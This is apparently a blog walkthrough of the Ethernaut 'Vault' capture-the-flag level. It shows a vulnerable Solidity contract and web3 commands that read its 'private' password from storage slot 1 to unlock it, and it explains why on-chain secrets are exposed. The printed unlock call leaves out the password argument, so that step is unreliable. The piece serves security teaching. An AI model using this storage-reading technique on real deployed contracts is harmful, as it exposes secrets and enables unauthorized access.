This is the level 8 of Ethernaut game.
Pre-requisites
- Layout of state variables in Solidity
- Reading storage at a slot in contract
Hack
Given contract:
// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Vault { bool public locked; bytes32 private password; constructor(bytes32 _password) public { locked = true; password = _password; } function unlock(bytes32 _password) public { if (password == _password) { locked = false; } } } player has to set locked to false.
Only way is by calling unlock by correct password.
Although password state variable is private, one can still read a storage variable by determining it's storage slot. Therefore sensitive information should not be stored on-chain, even if it is specified private.
Above, the password is at a storage slot of 1 in Vault.
Let's read it:
password = await web3.eth.getStorageAt(contract.address, 1) Call unlock with password:
await contract.unlock() Unlocked. Verify by:
await contract.locked() === false And that's it.
Learned something awesome? Consider starring the github repo 😄
and following me on twitter here 🙏
Top comments (0)